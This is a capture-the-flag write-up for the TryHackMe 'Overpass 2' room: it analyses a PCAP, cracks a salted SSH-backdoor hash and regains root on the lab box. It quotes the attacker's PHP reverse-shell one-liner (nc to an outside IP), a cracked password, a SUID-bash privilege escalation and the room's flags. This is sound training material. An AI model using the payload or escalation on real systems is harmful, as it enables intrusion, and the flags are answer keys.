CTF-Writeups/TryHackMe/Overpass2.md
2020-11-28 21:20:40 +05:00

4.3 KiB

TryHackMe-Overpass 2

Forensics-Analyse the PCAP

  1. What was the URL of the page they used to upload a reverse shell?

development

  1. What payload did the attacker use to gain access?

<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>

  1. What password did the attacker use to privesc?

Follow the tcp stream from packet 4 and change the stream until you see something interesting

 `whenevernoteartinstant`
  1. How did the attacker establish persistence?

https://github.com/NinjaJc01/ssh-backdoor

  1. Using the fasttrack wordlist, how many of the system passwords were crackable?

Store the hashes in a text file for cracking

4

Research-Analyse the code

  1. What's the default hash for the backdoor?

Visit the github for the ssh-backdoor

bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3

  1. What's the hardcoded salt for the backdoor?

You can find the salt being passed to verifypass function

1c362db832f3f864c8c2fe05f2002a05

  1. What was the hash that the attacker used? - go back to the PCAP for this!

6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed

  1. Crack the hash using rockyou and a cracking tool of your choice. What's the password?

Since the hash is SHA512 we are going to use hashcat and for that we have to find the mode for that hash so we can specify it to crack

But doing this didn't help as this is salted so we know the default hash that this backdoor uses so add the default salt to the hash

6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05

november16

Attack-Get back in!

NMAP

nmap -sC -sV 10.10.196.150
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-28 21:06 PKT
Stats: 0:00:28 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.75% done; ETC: 21:06 (0:00:00 remaining)
Stats: 0:00:28 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.75% done; ETC: 21:06 (0:00:00 remaining)
Nmap scan report for 10.10.196.150
Host is up (0.16s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e4:3a:be:ed:ff:a7:02:d2:6a:d6:d0:bb:7f:38:5e:cb (RSA)
|   256 fc:6f:22:c2:13:4f:9c:62:4f:90:c9:3a:7e:77:d6:d4 (ECDSA)
|_  256 15:fd:40:0a:65:59:a9:b5:0e:57:1b:23:0a:96:63:05 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: LOL Hacked
2222/tcp open  ssh     OpenSSH 8.2p1 Debian 4 (protocol 2.0)
| ssh-hostkey: 
|_  2048 a2:a6:d2:18:79:e3:b0:20:a2:4f:aa:b6:ac:2e:6b:f2 (RSA)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.99 seconds
  1. The attacker defaced the website. What message did they leave as a heading?

H4ck3d by CooctusClan

  1. What's the user flag?

Now there are two ports open for SSH

Port 22 didn't work but port 2222 did as we saw from the nmap scan it is another ssh port

thm{d119b4fa8c497ddb0525f7ad200e6567}

  1. What's the root flag?

The binary .suid_bash has SUID permissions that can execute has the owner of that file so with ./.suid_bash -p this -p will allow to run as the permissions of that users

thm{d53b2684f169360bb9606c333873144d}